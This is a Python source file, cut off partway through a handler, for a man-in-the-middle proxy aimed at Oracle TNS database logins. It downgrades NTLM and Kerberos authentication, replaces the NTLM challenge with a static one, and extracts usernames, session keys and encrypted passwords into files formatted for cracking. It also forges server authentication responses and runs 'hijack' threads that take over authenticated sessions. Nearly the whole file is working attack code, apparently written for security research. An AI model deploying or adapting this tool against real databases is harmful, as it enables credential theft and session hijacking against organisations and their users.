#!/usr/bin/python

#The code is released under GPLv2 (http://www.gnu.org/licenses/gpl-2.0.html),
#by Laszlo Toth.
#Use the code at your own responsibility.
#For help and disclaimer please visit:
#  http://www.soonerorlater.hu/index.khtml?article_id=517


import SocketServer
import socket
import sys
from struct import *
import threading
from ntlm import *
import re
import binascii
from configobj import ConfigObj
from validate import Validator
from aesdecrypt import *
from bitstring import BitString
import array
import logging
import time

downNTLMv1=0
staticNTLM=1
downKerberos=1
downOracle=0
downJDBC=0
newClient=1
clientName=""
serverName=""
domain=""
winUser=""
challengeNTLM=""

protect_pwdfile=threading.BoundedSemaphore(value=1)

FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])

def hexdump(src, length=8):
    result=[]
    for i in xrange(0, len(src), length):
        s = src[i:i+length]
        hexa = ' '.join(["%02X"%ord(x) for x in s])
        printable = s.translate(FILTER)
        result.append("%04X   %-*s   %s\n" % (i, length*3, hexa, printable))
    return ''.join(result)
    


#It will send the log to the wx gui Now just prints it.
class LoggingRedirectHandler(logging.Handler):
    def __init__(self,):
        logging.Handler.__init__(self)

    def emit(self, record):
        msg=self.format(record)
        #wx.CallAfter(Publisher().sendMessage, "insertLog", msg)
        print msg


#Downgrade to NTLMv1
def downgradetoNTLMv1(data):
    NTLM2_FLAG=0x00080000L
    offset=data.find("NTLMSSP")
    if(offset==-1):
        return data
    prec, type, FLAG, end = unpack("<{0}sLL{1}s".format(offset+8, len(data)-12-4-offset), data)
    if(type!=1):
        return data
    FLAG=FLAG^NTLM2_FLAG
    data=pack("<{0}sLL{1}s".format(offset+8, len(data)-12-4-offset), prec, type, FLAG, end)
    return data
    
#Downgrade to 8i authentication
def downgradeOracle(data):
    return data

#Replace the value 0x08 to 0x00 in the type representation packet of the client.
def downgradeJDBC11g(data):
    bsData=BitString(data=data, length=len(data)*8)
    bsData[13:14:8]=0
    return bsData.data
    
   
def checkQuit(data):
    #When in sqlplus you type in quit, the client sends the byte sequence below 
    #and the act seq number at the end. 
    if(data.find("\x00\x00\x03\x09")==0 and len(data)==5):
        return 1
    if(data.find("\x03\x09")==len(data)-3):
        return 1
    return 0

#Returns the seq number of a request. It is the third byte in a request packet
def getSeq(data):
    if(len(data)-5>0):
        begin, seq, end=unpack("<4sB{0}s".format(len(data)-5),data)
    else:
        begin, seq=unpack("<4s1B",data)        
    return seq

#Change the third byte in the request to the saved seq number to have a 
#correct seq number for the new client
def modifySeq(data, seq):
    begin, end = unpack("<4s1x{0}s".format(len(data)-5),data)
    data = pack("<4s1B{0}s".format(len(data)-5),begin,seq,end)    
    return data

def getAuthPwd(data, downgraded, clntType, clntVer):
    offset=data.find("AUTH_PASSWORD")
    if(offset==-1):
        return ""
    authpwd=""
    #JDBC before 11g
    if(clntType=="Java" and clntVer.startswith("8")):
        bsData=BitString(data=data,length=len(data)*8)
        authpwd_len=bsData[offset+13+2:offset+13+2+1:8].uint
        authpwd=bsData[offset+13+3:offset+13+3+authpwd_len-1:8].data 
    #sqldeveloper or 11g JDBC thin was downgraded
    elif(downgraded and clntType=="Java"):
        bsData=BitString(data=data,length=len(data)*8)
        authpwd_len=bsData[offset+13+2:offset+13+2+1:8].uint
        authpwd=bsData[offset+13+3:offset+13+3+authpwd_len-1:8].data 
    else:    
        begin,authpwd_len = unpack("{0}sB{1}x".format(offset+13+4, len(data)-offset-13-4-1), data)
        begin,authpwd = unpack("{0}s{1}s{2}x".format(offset+13+5, authpwd_len, len(data)-offset-13-5-authpwd_len), data)
    return authpwd

def getAuthSessKey(data,client):
    offset=data.find("AUTH_SESSKEY")
    if(offset==-1):
        return ""
    authsesskey=""
    if(data[offset+12:offset+12+6]=="\x60\x00\x00\x00\xfe\x40"):
        begin,authsesskey,=unpack("{0}s{1}s{2}x".format(offset+12+6, 97, len(data)-offset-12-6-97), data)
        authsesskey=re.sub(" ","",authsesskey)
        return authsesskey
    begin,authsesskey_len = unpack("{0}sB{1}x".format(offset+12, len(data)-offset-12-1), data)
    #11g java (KEY,0x01,0x60,0x60)
    if(authsesskey_len==1):
        begin,authsesskey_len = unpack("{0}sB{1}x".format(offset+12+1, len(data)-offset-12-2), data)
        if(client):
            begin,authsesskey = unpack("{0}s{1}s{2}x".format(offset+12+4, authsesskey_len+1, len(data)-offset-12-4-authsesskey_len-1), data)
        else:
            begin,authsesskey = unpack("{0}s{1}s{2}x".format(offset+12+3, authsesskey_len, len(data)-offset-12-3-authsesskey_len), data)
    #11gw64-->11glin64
    elif(authsesskey_len==32):
        authsesskey_len=96
        begin,authsesskey = unpack("{0}s{1}s{2}x".format(offset+12+6, authsesskey_len+1, len(data)-offset-12-6-authsesskey_len-1), data)
    else:
        begin,authsesskey = unpack("{0}s{1}s{2}x".format(offset+12+5, authsesskey_len, len(data)-offset-12-5-authsesskey_len), data)
    #In 11g OCI  there is a space in the auth_sesskey
    if(authsesskey.find(" ")!=-1):
        if(not client):
            begin,authsesskey = unpack("{0}s{1}s{2}x".format(offset+12+6, authsesskey_len+1, len(data)-offset-12-6-authsesskey_len-1), data)
        authsesskey=re.sub(" ","",authsesskey)
    return authsesskey

def getUsername(data, downgraded, clntType, clntVer):
    offset_ap=data.find("AUTH_PASSWORD")
    offset_ask=data.find("AUTH_SESSKEY")
    if(offset_ap==-1):
        return ""
    #JDBC before 11g
    if(clntType=="Java" and clntVer.startswith("8")):
        bsData=BitString(data=data,length=len(data)*8)
        userlen=bsData[7:8:8].uint
        username=bsData[16:16+userlen:8].data   
    #sqldeveloper or 11g JDBC thin was downgraded
    elif(downgraded and clntType=="Java"):
        bsData=BitString(data=data,length=len(data)*8)
        userlen=bsData[7:8:8].uint
        username=bsData[16:16+userlen:8].data
    #sqlplus
    elif(offset_ap > offset_ask):
        usrlen,=unpack("33xB{0}x".format(len(data)-33-1),data)
        username,=unpack("34x{0}s{1}x".format(usrlen,len(data)-34-usrlen),data)
    #sqldeveloper
    else:
        usrlen,=unpack("7xB{0}x".format(len(data)-7-1),data)
        username,=unpack("16x{0}s{1}x".format(usrlen,len(data)-16-usrlen),data)
    return username

def getAuthVFRdata(data):
    offset_avfr=data.find("AUTH_VFR_DATA")
    if(offset_avfr==-1):
        return ""
    #sqlplus
    if(data[offset_avfr+13+1]=='\x14'):
        authvfrdata,=unpack("{0}x20s{1}x".format(offset_avfr+13+3,len(data)-(offset_avfr+13+3)-20),data)
    #sqldeveloper
    elif(data[offset_avfr+13+4]=='\x14'):
        authvfrdata,=unpack("{0}x20s{1}x".format(offset_avfr+13+5,len(data)-(offset_avfr+13+5)-20),data)
    else:
        authvfrdata=""
    return authvfrdata

def getOraType(data):
    offset=data.find("86_64/Linux 2.4.")
    if(offset!=-1):
        return "Linux64"
    offset=data.find("Linux-2.0.34-8.1.0")
    if(offset!=-1):
        return "Linux"
    offset=data.find("IBMPC/WIN_NT-8.1.0")
    if(offset!=-1):
        return "Windows"
    offset=data.find("Java_TTC-8.2.0")
    if(offset!=-1):
        return "Java"
    return ""

#Get the version number from the SNS packet
def getOraVer(data):
    offset=data.find('\xde\xad\xbe\xef')
    if(offset!=-1):
        i,j,k=unpack("8xBBB{0}x".format(len(data)-11),data)
        if(i!=0):
            ver="{0}.{1}.0.{2}".format(i,j/16,k)
        else:
            i,j,k=unpack("27xBBB{0}x".format(len(data)-30), data)
            ver="{0}.{1}.0.{2}".format(i,j/16,k)
        return ver
    else:
        return ""
    
#Creating negotiation package for keberos downgrade, the code comes from python-ntlm
def create_NTLM_NEGOTIATE_MESSAGE(winUser,clientName,domain, downgrade):
    BODY_LENGTH = 40
    Payload_start = BODY_LENGTH # in bytes
    protocol = 'NTLMSSP\0'    #name        
    
    type = pack('<I',1) #type 1
    
    if(downgrade):
        flags =  pack('<I', NTLM_TYPE1_FLAGS_NTLMv1)
    else:
        flags =  pack('<I', NTLM_TYPE1_FLAGS)
    
    Workstation = clientName.upper().encode('ascii')
    user_parts = winUser.split('\\', 1)
    DomainName = domain.upper().encode('ascii')
    EncryptedRandomSessionKey = ""
    
    
    WorkstationLen = pack('<H', len(Workstation))
    WorkstationMaxLen = pack('<H', len(Workstation))
    WorkstationBufferOffset = pack('<I', Payload_start)
    Payload_start += len(Workstation)
    DomainNameLen = pack('<H', len(DomainName))
    DomainNameMaxLen = pack('<H', len(DomainName))
    DomainNameBufferOffset = pack('<I',Payload_start)
    Payload_start += len(DomainName)
    ProductMajorVersion = pack('<B', 5)
    ProductMinorVersion = pack('<B', 1)
    ProductBuild = pack('<H', 2600)
    VersionReserved1 = pack('<B', 0)
    VersionReserved2 = pack('<B', 0)
    VersionReserved3 = pack('<B', 0)
    NTLMRevisionCurrent = pack('<B', 15)
    
    msg1 = protocol + type + flags + \
            DomainNameLen + DomainNameMaxLen + DomainNameBufferOffset + \
            WorkstationLen + WorkstationMaxLen + WorkstationBufferOffset + \
            ProductMajorVersion + ProductMinorVersion + ProductBuild + \
            VersionReserved1 + VersionReserved2 + VersionReserved3 + NTLMRevisionCurrent
    assert BODY_LENGTH==len(msg1), "BODY_LENGTH: %d != msg1: %d" % (BODY_LENGTH,len(msg1))
    msg1 += Workstation + DomainName
    #msg1 = base64.encodestring(msg1)
    #msg1 = string.replace(msg1, '\n', '')
    
    sns="\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF"
    f=open("11gwinkerbdown/02_ntlm_type1")
    packet=f.read()
    length=pack(">H",len(packet)+2+len(msg1)+12+2)
    snslen=pack(">H",len(packet)+len(msg1)+4+2)
    ntlmlen=pack(">H",len(msg1))
    msg1=length+sns+snslen+packet+msg1
    return msg1

def parse_NTLM_CHALLENGE_MESSAGE(data):
    ""
    offset=data.find('NTLMSSP')
    if(offset==-1):
        return ("","")

    msg2=data[offset:len(data)]
    Signature = msg2[0:8]
    msg_type = unpack("<I",msg2[8:12])[0]
    
    if(msg_type!=2):
        return ("","")
    
    TargetNameLen = unpack("<H",msg2[12:14])[0]
    TargetNameMaxLen = unpack("<H",msg2[14:16])[0]
    TargetNameOffset = unpack("<I",msg2[16:20])[0]
    TargetName = msg2[TargetNameOffset:TargetNameOffset+TargetNameMaxLen]
    NegotiateFlags = unpack("<I",msg2[20:24])[0]
    ServerChallenge = msg2[24:32]
    Reserved = msg2[32:40]
    TargetInfoLen = unpack("<H",msg2[40:42])[0]
    TargetInfoMaxLen = unpack("<H",msg2[42:44])[0]
    TargetInfoOffset = unpack("<I",msg2[44:48])[0]
    TargetInfo = msg2[TargetInfoOffset:TargetInfoOffset+TargetInfoLen]
    i=0
    TimeStamp = '\0'*8
    return (binascii.hexlify(ServerChallenge), TargetName.decode('utf-16'))

def staticNTLMChallange(data, challenge):
    offset=data.find('NTLMSSP')
    if(offset==-1):
        return data

    msg2=data[offset:len(data)]
    Signature = msg2[0:8]
    msg_type = unpack("<I",msg2[8:12])[0]
    
    if(msg_type!=2):
        return data
    
    data_array=array.array('c')
    data_array.fromstring(data)
    challenge_array=array.array('c')
    challenge_array.fromstring(binascii.unhexlify(challenge))
    for i in range(0,8):
        data_array[offset+24+i]=challenge_array[i]
    data=data_array.tostring()
    return data 

def parse_NTLM_AUTHENTICATE_MESSAGE(data):
    offset=data.find('NTLMSSP')
    if(offset==-1):
        return ("","","")

    msg3=data[offset:len(data)]
    Signature = msg3[0:8]
    msg_type = unpack("<I",msg3[8:12])[0]
    
    if(msg_type!=3):
        return ("","","")
    (LmChallengeResponseOffset,NtChallengeResponseOffset,DomainNameLen,
     DomainNameOffset,UserNameLen, UserNameOffset,
     WorkstationLen, WorkstationOffset)=unpack("8x4x2x2xI2x2xIH2xIH2xIH2xI{0}x".format(len(msg3)-52),msg3)
    LmChallengeResponse,=unpack("{0}x24s{1}x".format(LmChallengeResponseOffset,len(msg3)-LmChallengeResponseOffset-24),msg3)
    NtChallengeResponse,=unpack("{0}x24s{1}x".format(NtChallengeResponseOffset,len(msg3)-NtChallengeResponseOffset-24),msg3)
    UserName,=unpack("{0}x{1}s{2}x".format(UserNameOffset,UserNameLen,len(msg3)-UserNameOffset-UserNameLen),msg3)
    
    return (UserName.decode('utf-16'), binascii.hexlify(LmChallengeResponse),
            binascii.hexlify(NtChallengeResponse))

#Creating the false AUTH_SVR_RESP
def do_encrypt( cipherType, key, iv, plain_text ) :
    enc = EncryptCipher( cipherType, key, iv )
    cipher_text = enc.finish( plain_text )
    return cipher_text

def do_decrypt( cipherType, key, iv, cipher_text ) :
    dec = DecryptCipher( cipherType, key, iv )
    plain_text = dec.finish( cipher_text )
    return plain_text

def createSVRResp11g(data,client_auth_skey,clntType):
    
    offset=data.find("AUTH_SVR_RESPONSE")
    if(offset==-1):
        return data
    
    decr_srv_auth_skey='7C3708C88A5ACD25F22CB1BA60EE6B2C86C4BFF1B71FD764837AB89739F19C2C000E83E20499A174'
    #proxytest
    hash='1D2F4C06C18FC543108349421B1F5AB365F747D700000000'
    #randomdata+"SERVER_TO_CLIENT"
    decr_auth_srv_resp='A651F7F188ABD38BC37CA312867013325345525645525F544F5F434C49454E54'
    
    #decrypt the AUTH_SESSKEY from the client
    decr_client_auth_skey=decrypt_sesskey(client_auth_skey,hash,192)
    csk_str=combine_skeys_11g(decr_srv_auth_skey, decr_client_auth_skey)
    encr_auth_pwd=encrypt_password(decr_auth_srv_resp, csk_str, 192)
    
    #Number of bytes between the AUTH_SVR.. string and the key itself
    diff=5
    if(clntType=="Java"):
        diff=3
    
    begin,middle,end=unpack("{0}s{1}s{2}s".format(offset+17+diff,96,len(data)-offset-17-diff-96),data)
    data=begin+encr_auth_pwd+end
    return data

def replaceAuthVfrData(data):
    offset=data.find("AUTH_VFR_DATA")
    if(offset==-1):
        return data
    auth_vfr_data="0567D543124B7BEAB0D1"
    #sqlplus 64bit 11.2.0.3-->linux 64bit 11.2.0.3
    if(data[offset+13:offset+13+5]=="\x14\x00\x00\x00\x14"):
        begin,old_vfr,end=unpack("{0}s{1}s{2}s".format(offset+18,20,len(data)-offset-18-20), data)
    #sqldeveloper 3.2 ---> linux 64bit 11.2.0.3
    if(data[offset+13:offset+13+3]=="\x01\x14\x14"):
        begin,old_vfr,end=unpack("{0}s{1}s{2}s".format(offset+16,20,len(data)-offset-16-20), data)
    data=begin+auth_vfr_data+end
    return data



def replaceAuthSessKey(data):
    offset=data.find("AUTH_SESSKEY")
    if(offset==-1):
        return ""
    authsesskey="BC1B71A9AC5080A73BE9EB0D559AB6DE4199DD93D9D45A373D7AC8276668E316986AF7D486E834A45F961517D9CE62AF"
    begin,authsesskey_len = unpack("{0}sB{1}x".format(offset+12, len(data)-offset-12-1), data)
    #11g java (KEY,0x01,0x60,0x60)
    if(authsesskey_len==1):
        begin,authsesskey_len = unpack("{0}sB{1}x".format(offset+12+1, len(data)-offset-12-2), data) 
        begin,authsesskey_old,end = unpack("{0}s{1}s{2}s".format(offset+12+3, authsesskey_len, len(data)-offset-12-3-authsesskey_len), data)
    #11gw64-->11glin64
    elif(authsesskey_len==32):
        authsesskey_len=96
        begin,authsesskey_old,end = unpack("{0}s{1}s{2}s".format(offset+12+6, authsesskey_len+1, len(data)-offset-12-6-authsesskey_len-1), data)
    else:
        begin,authsesskey_old,end = unpack("{0}s{1}s{2}s".format(offset+12+5, authsesskey_len, len(data)-offset-12-5-authsesskey_len), data)
    #In 11g OCI  there is a space in the auth_sesskey
    if(authsesskey_old.find(" ")!=-1):
        begin,authsesskey_old,end = unpack("{0}s{1}s{2}s".format(offset+12+6, authsesskey_len+1, len(data)-offset-12-6-authsesskey_len-1), data)
        authsesskey_old=re.sub(" ","",authsesskey_old)
        authsesskey=authsesskey[0:39]+" "+authsesskey[39:]
    data=begin+authsesskey+end
    return data

def createSVRResp10g(data,client_auth_skey):
    decr_srv_auth_skey='8D51FCD3F64A2FAE56CAC68C6549E5B7EF10F84D1A1C3C78A788427AF71DC1CF'

    #proxytest
    hash='691DECF2848FD33E0000000000000000'
    #randomdata+"SERVER_TO_CLIENT+padding"
    decr_auth_srv_resp='C48F9FBA76EEDDC054C140D63D6825455345525645525F544F5F434C49454E54'
    
    #decrypt the AUTH_SESSKEY from the client
    decr_client_auth_skey=decrypt_sesskey(client_auth_skey,hash,128)
    csk_str=combine_skeys_10g(decr_srv_auth_skey, decr_client_auth_skey)
    encr_auth_pwd=encrypt_password(decr_auth_srv_resp, csk_str, 128)
    
    #Modify the packet
    offset=data.find("AUTH_SVR_RESPONSE")
    begin,middle,end=unpack("{0}s{1}s{2}s".format(offset+17+5,96,len(data)-offset-17-5-96),data)
    data=begin+encr_auth_pwd+end
    return data


def createSrvNameResp(serverName,domain):
    sns="\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF"
    f=open("11gwinkerbdown/01_server_name","rb")
    packet=f.read()
    snslength=pack(">H",len(packet)+len(domain)+1+len(serverName)+4+2)
    length=pack(">H",2+len(sns)+2+len(packet)+len(domain)+1+len(serverName))
    fakeSrvName=length+sns+snslength+packet
    fakeSrvName=fakeSrvName+domain.upper()+"\\"+serverName.upper()
    return fakeSrvName

def isKerberos(data):
    if(data.find("\xde\xad\xbe\xef\x00\x4d\x0b\x10\x06")!=-1):
        return 1
    return 0
   
def savePwdFile(filename, line):
    protect_pwdfile.acquire()
    try:
        fout=open(filename,"a")
        fout.write(line)
        fout.close()
    except IOError:
        print "Could not wirte to the file: %s" % filename
        protect_pwdfile.release()
    protect_pwdfile.release()
            
     
class NewClientServer(SocketServer.TCPServer):
    #Pass the already opened socket (connection to the Oracle server) to the handler function
    def setOraSocket(self,oraSocket):
        self.oraSocket=oraSocket
        
    def setSeq(self,seq):
        self.seq=seq
    
    def setSrvType(self, srvType):
        self.srvType=srvType
    
    def setSrvVer(self, srvVer):
        self.srvVer=srvVer
        
    def setClntType(self, clntType):
        self.clntType=clntType
        
    def setClntVer(self, clntVer):
        self.clntVer=clntVer
        
    def setPacketsFromSrv(self,packetsfromsrv):
        self.packetsfromsrv=packetsfromsrv
    
    def setIndex(self,index):
        self.index=index
    
class NewClient(threading.Thread):
    
    def __init__(self, seq, socket, atthost, attport, srvType, srvVer, clntType, clntVer, packetsfromsrv):
        self.seq=seq
        self.socket=socket
        self.atthost=atthost
        self.attport=attport
        self.srvType=srvType
        self.clntType=clntType
        self.clntVer=clntVer
        self.srvVer=srvVer
        self.packetsfromsrv=packetsfromsrv
        lh=LoggingRedirectHandler()
        lh.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        lh.setFormatter(formatter)
        self.logger=logging.getLogger("Hijack Thread {0}".format(self.attport))
        self.logger.setLevel(logging.DEBUG)
        self.logger.addHandler(lh)
        threading.Thread.__init__(self)
    
    def run(self):
        self.logger.info("New hijack thread started, waiting for connection on port {0}!".format(self.attport))
        self.logger.info("Use "+self.clntVer+" " + self.clntType + " client to connect to the hijack thread!!!!")
        self.logger.info("The server version is "+self.srvVer+" " + self.srvType + "!")
        srvNewClient =  NewClientServer((self.atthost, self.attport), NewClientHandler11g)
        srvNewClient.setOraSocket(self.socket)
        srvNewClient.setSeq(self.seq)
        srvNewClient.setSrvType(self.srvType)
        srvNewClient.setSrvVer(self.srvVer)
        srvNewClient.setClntType(self.clntType)
        srvNewClient.setClntVer(self.clntVer)
        srvNewClient.setPacketsFromSrv(self.packetsfromsrv)
        srvNewClient.setIndex(0)
        srvNewClient.serve_forever()

class NewClientHandler11g(SocketServer.BaseRequestHandler):
    
    def __init__(self, request, client_address, server):
        lh=LoggingRedirectHandler()
        lh.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        lh.setFormatter(formatter)
        server.index=server.index+1
        self.logger=logging.getLogger("Hijack Thread Handler {attport}:{index}".format(index=server.index, attport=server.server_address[1]))
        self.logger.setLevel(logging.DEBUG)
        self.logger.addHandler(lh)
        SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
    
    def handle(self):
        #This should be a parameter of the NewClient class
        global downOracle
        quit=False
        
        
        #We need to know when we receive the username packet from the client.
        receivedfirstusrname=False
        clntType=self.server.clntType
        packetsfromsrv=self.server.packetsfromsrv
        client_auth_skey=""
        
        self.logger.info("{0}:{1} connected to a hijack thread on port {2}!".format(self.client_address[0], str(self.client_address[1]),
                                                                                self.server.server_address[1]))
        
        #Server socket
        server_sock=self.server.oraSocket
        seq=self.server.seq+1
        
        #We know exactly what should happen here. There are two packets in a row from the client
        #in case of win64 server and client
        self.request.settimeout(2)
        i=0
        while(packetsfromsrv[i].find("AUTH_VFR_DATA")==-1):
            i+=1
        packetsfromsrv[i]=replaceAuthVfrData(packetsfromsrv[i])
        packetsfromsrv[i]=replaceAuthSessKey(packetsfromsrv[i])
        
           
        i=0
        while(packetsfromsrv[i].find("Oracle")==-1):
            try:
                self.header=self.request.recv(8)
            except:
                a=1
            packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
            packet_length=socket.ntohs(packet_length)
            if(packet_length > 8):
                self.data=""
                buff=""
                while(len(self.data) < packet_length-8):
                    try:
                        buff=self.request.recv(packet_length-8-len(self.data))
                    except:
                        if (len(buff)==0):
                            break
                    self.data=self.data+buff
                    buff=""
            else:
                self.data=""

            #Beacuse there are two packets from the client after the typreps in case of
            #windows. Thus we check whether we received the username packet. In bothe usernmae
            #we there is authterminal so we need to check we just break after the first one.
            
            if(self.data.find("AUTH_TERMINAL")!=-1 and not receivedfirstusrname):
                receivedfirstusrname=True
            if(client_auth_skey==""):
                client_auth_skey=getAuthSessKey(self.data,1)
            tosend=packetsfromsrv[i]
            i+=1
            if(tosend.find("AUTH_SESSKEY")!=-1 and not receivedfirstusrname):
                i-=1
            if(downOracle==0 and (downJDBC==0)):   
                if(self.server.srvVer.startswith("11.")):
                    tosend=createSVRResp11g(tosend,client_auth_skey,clntType)
                elif(self.server.srvVer.startswith("10.")):
                    tosend=createSVRResp10g(tosend,client_auth_skey)
            if(tosend.find("AUTH_SESSKEY")==-1 or receivedfirstusrname):
                self.request.send(tosend)
                hexdump(packetsfromsrv[i])
        
        self.request.settimeout(2)
        while(not quit):
      
            #From the client
            try:
                self.header = ""
                self.header = self.request.recv(8)
            except socket.timeout:
                pass
            if(len(self.header)):
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                packet_length=socket.ntohs(packet_length)
                self.data=self.request.recv(packet_length-8)
                #The packet is not a marker packet. In a marker packet there is no seq number
                quit=checkQuit(self.data)
                if(quit):
                    self.server.setSeq(seq)
                    self.request.close()
                if(packet_type!=12):
                    if(seq==255):
                        seq=0
                    self.data=modifySeq(self.data,seq)
                    seq=seq+1
                if(not quit):
                    send=self.header+self.data
                    server_sock.send(send)
            
            #From the server
            try:
                self.header = ""
                self.header=server_sock.recv(8)
            except socket.timeout:
               pass
            if(len(self.header)>=8):
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                packet_length=socket.ntohs(packet_length)
                if(packet_length > 8):
                    self.data=server_sock.recv(packet_length-8)
                else:
                    self.data=""
                send=self.header+self.data
                self.request.send(send)                

class KerbTNSHandler(SocketServer.BaseRequestHandler):
    
    def __init__(self, request, client_address, server):
        lh=LoggingRedirectHandler()
        lh.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        lh.setFormatter(formatter)
        server.index=server.index+1
        self.logger=logging.getLogger("Main Thread Handler {attport}:{index}".format(index=server.index, attport=server.server_address[1]))
        self.logger.setLevel(logging.DEBUG)
        self.logger.addHandler(lh)
        SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
    
    def handle(self):   
        global downNTLMv1
        global downOracle
        self.status=0
        fakeNeg=""
        realChall=""
        fakeSrvName=""
        authsesskeySrv=""
        authpassword=""
        authsesskeyClnt=""
        srvType=""
        clntType=""
        seq=0
        seqloc=0
        srvVer=""
        clntVer=""
        ntlmChallenge=""
        ntlmServer=""
        ntlmUserName=""
        LmChallengeResponse=""
        NtChallengeResponse=""
        #We would like to save every packet from the server to replay it 
        #in the hijack thread.
        nomorefromsrv=False
        nofpacketsfromsrv=0
        packetsfromsrv=[]
        #When downgrading the JDBC 11g, typerep packet only should be checked
        downgraded=0
        
        # For kerberos downgrading we need the NTLM type1 packet
        fakeNeg=create_NTLM_NEGOTIATE_MESSAGE(winUser,clientName,domain,downNTLMv1)
        # For kerberos downgrading we need to create the server name packet
        fakeSrvName=createSrvNameResp(serverName,domain)
        
        self.header = self.request.recv(8)
        packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
        self.logger.info("{0} connected on port {1}. It will be redirected to {2}:{3}.".format(self.client_address[0], self.server.server_address[1], 
                                                                                      self.server.SrvHost,self.server.SrvPort))
        packet_length=socket.ntohs(packet_length)
        self.data=self.request.recv( packet_length-8)
        #In some cases when tnspoison is used, the connect packet arrives in two packets
        self.header2=""
        self.data2=""
        if(packet_length < 100):
            self.header2 = self.request.recv(8)
            packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header2)
            packet_length=socket.ntohs(packet_length)
            self.data2=self.request.recv( packet_length-8)
        
        #In case of the tnsposioning attack, the server can send us redirect instead of accept
        #Therefore we disconnect and try to connect again until we receive accept.
        while(packet_type!=11 and packet_type!=4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.server.SrvHost, self.server.SrvPort))
            send=self.header+self.data
            send2=self.header2+self.data2
            sock.send(send)
            if(len(send2) > 0):
                sock.send(send2)
            sock.settimeout(1)
            self.request.settimeout(1)
            tmpheader = ""
            try:
                tmpheader=sock.recv(8)
            except socket.timeout:
                pass
            if(len(tmpheader)>=8):
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  tmpheader)
        
        if(packet_type==11):
            #packetsfromsrv[nofpacketsfromsrv]=tmpheader
            packetsfromsrv.append(tmpheader)
            nofpacketsfromsrv+=1
            self.request.send(tmpheader)
        else:
	    self.logger.error("{0} connected on port {1}, but it sent wrong SID. {2}:{3} refused the connection!".format(self.client_address[0], self.server.server_address[1], 
                                                                                      self.server.SrvHost,self.server.SrvPort))
	    packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH', tmpheader)
            packet_length=socket.ntohs(packet_length)
            refusedata=sock.recv( packet_length-8)
	    self.request.send(tmpheader+refusedata)
	    time.sleep(4)
            sock.close()
	    return
	
        quit=0
        while(authpassword==""):
            #From the server
            try:
                self.header = ""
                self.header=sock.recv(8)
            except socket.timeout:
                pass
            if(len(self.header)):
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                packet_length=socket.ntohs(packet_length)
                if(packet_length > 8):
                    self.data=""
                    buff=""
                    while(len(self.data) < packet_length-8):
                        try:
                            buff=sock.recv(packet_length-8-len(self.data))
                        except:
                            if (len(buff)==0):
                                break
                        self.data=self.data+buff
                        buff=""
                    #self.data=sock.recv(packet_length-8)
                else:
                    self.data=""
                
                authsesskeySrv=getAuthSessKey(self.data,0)
                authVFRdata=getAuthVFRdata(self.data)
                if(srvVer==""):
                    srvVer=getOraVer(self.data)
                if(srvType==""):
                    srvType=getOraType(self.data)
                if(ntlmChallenge==""):
                    if(dochallengeNTLM):
                        self.data=staticNTLMChallange(self.data, challengeNTLM)
                    ntlmChallenge, ntlmServer=parse_NTLM_CHALLENGE_MESSAGE(self.data)
                send=self.header+self.data
                self.request.send(send)
                
                #We need only for the authentication part
                #if(nofpacketsfromsrv < 8):
                packetsfromsrv.append(send)
                nofpacketsfromsrv+=1
            
            #From the client
            try:
                self.header = ""
                self.header = self.request.recv(8)
            except socket.timeout:
                pass
            if(len(self.header)):
                
                packet_length, packet_checksum, packet_type,  rsrvd_byte, header_checksum=unpack('HHBBH',  self.header)
                packet_length=socket.ntohs(packet_length)
                if(packet_length > 8):
                    self.data=""
                    buff=""
                    while(len(self.data) < packet_length-8):
                        try:
                            buff=self.request.recv(packet_length-8-len(self.data))
                        except:
                            if (len(buff)==0):
                                break
                        self.data=self.data+buff
                        buff=""
                #self.data=self.request.recv(packet_length-8)
                if(downNTLMv1):
                    self.data=downgradetoNTLMv1(self.data)
                if(downOracle):
                    self.data=downgradeOracle(self.data)
                #quit=checkQuit(self.data)
                authpassword=getAuthPwd(self.data, downgraded, clntType, clntVer)
                authsesskeyClnt=getAuthSessKey(self.data,1)
                if(ntlmUserName==""):
                    #ntlmUserName, LmChallengeResponse, NtChallengeResponse = parse_NTLM_AUTHENTICATE_MESSAGE(self.data)
                    if(ntlmUserName):
                        #print out for john
                        line=ntlmUserName.upper()+":::"+LmChallengeResponse.upper()+":"+NtChallengeResponse.upper()+":"+ntlmChallenge.upper()
                        if(johnfile!=""):
                            savePwdFile(johnfile, line+"\n")
                        #print line
                if(clntVer==""):
                    clntVer=getOraVer(self.data)

                #After the clntType packet and just once
                if(clntType=="Java" and downgraded==0 and downJDBC):
                    self.data=downgradeJDBC11g(self.data)
                    downgraded=1
                if(clntType==""):
                    clntType=getOraType(self.data)
                    downgraded=0
                    
                if(authpassword):
                    username=getUsername(self.data, downgraded, clntType, clntVer)
                    line=username+":"+authsesskeySrv+":"
                    if(authsesskeyClnt):
                            line=line+authVFRdata+":"+authsesskeyClnt+":"
                    #There is an unnecessery byte at the end of the authpassword
                    authpassword=authpassword[0:len(authpassword)-len(authpassword)%2]
                    line=line+authpassword+":"+self.server.SrvHost+":"+"{0}".format(self.server.SrvPort)+":"+self.client_address[0]+":"+":"
                    if(worafile!=""):
                        savePwdFile(worafile, line+"\n")
                    #print line
                if(packet_type!=12):        
